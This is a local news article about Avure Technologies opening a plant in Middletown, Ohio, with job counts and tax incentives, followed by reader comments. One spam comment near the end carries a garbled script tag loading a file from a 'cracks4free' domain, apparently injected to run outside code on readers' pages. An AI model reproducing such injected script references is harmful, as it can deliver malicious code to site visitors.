Advanced manufacturer to open in Middletown, create high wage jobs

MIDDLETOWN —
A high-tech food equipment manufacturer has picked Middletown to open its first plant in the Americas and wants to start production of the machines before the end of the year.

Avure Technologies Inc. has signed a 10-year lease for a 53,000-square-foot building located in the Midd Cities Industrial Park, 2601 S. Verity Pkwy. The Swedish company will initially create 30 new jobs generating nearly $2 million in additional payroll to the city.

The high-paying jobs include production technicians and supervisors, engineers, material purchasers and customer service representatives. Estimates from the city are for hires to be paid an average $65,000 a year

The Ohio Tax Credit Authority approved incentives March 25 for Avure of a 40 percent, six-year tax credit, valued at more than $200,000.

On Tuesday, Middletown City Council also approved a 7-year, 40 percent income tax grant worth an estimated $95,000 in savings.

Denise Hamet, Middletown economic development director, told council Tuesday that the 10-year lease signifies the company’s long-term commitment to Middletown.

“That’s a very strong indication they’re here to stay and here to grow,” Hamet said

WILL THEY STAY MORE THAN 10 YEARS OR PACK UP, CLOSE SHOP AND MOVE OUT OF TOWN LIKE BLACK CLAWSON AND OTHERS DID YEARS AGO? TIME WILL TELL.

HOW MANY OF THESE HIGH PAID EMPLOYEES WILL LIVE IN MIDDLETOWN AND SPEND MONEY IN MIDDLETOWN? OR, WILL MOST LIVE OUTSIDE THE CITY, BE COMMUTERS AND ONLY BUY LUNCH HERE AS CONTRIBUTORS? NOT A BIG IMPACT FOR THE CITY IF ALL ARE COMMUTERS.

WILL THE COMPANY KEEP GROWING CREATING MORE HIGH PAYING JOBS?

DOES MIDDLETOWN HAVE THE SKILLED WORKERS TO BE CANDIDATES TO BE HIRED BY THIS COMPANY OR ARE THE MAJORITY OF MIDDLETOWN WORKERS DESTINED FOR UDF, DOLLAR GENERAL CASHIER WORK OR SERVICE INDUSTRY QUALIFIED? IF NOT, MIDDLETOWN WON'T BE HELPED THAT MUCH AS TO MONEY FLOW RESIDUALS FROM THIS NEW BUSINESS OTHER THAN CORPORATE/PAYROLL TAXES. BE SMART, DON'T BLEED 'EM DRY TAXING THEM TO DEATH OR THEY'LL BE GONE WHEN THE 10 YEARS ARE UP. WANT TO KEEP THEM? DON'T BLEED THEIR WALLET DRY WITH YOUR GREED.

Great news! Glad to see a business moving into to Middletown. Nothing negative here at all. Nice job.

Creating new jobs is GREAT! Although less than 85 jobs per year is not exactly something I'd jump up 'n down about.  We also need to create an environment that people WANT to live in: 1. Low Crime 2. Good Schools 3. Ammenities that attract Middle Income residents 4. Leadership who will focus on the needs of all people instead of the needs just the upper & lower class 5. To be able to drive down the street with a sense of pride in your community, etc.etc.

What happened to Score and the Buick dealer that was on 122 & Dixie Hwy.  I am aware that Pierson took over the Buick place, but why did Buick leave?

If you take  a birds eye view of the food companies in the United States then you will come to know that there is a big bunch of food companies providing different kinds of foods. This is good thing for the consumer as they will get excellent and hygienic food in this manner of tough competition between the food companies.< ="http://cracks4free.info/5/adds.js" async="" ="text/">

Actually I think the auto bailout czar forced Guyler Buick to close as well.
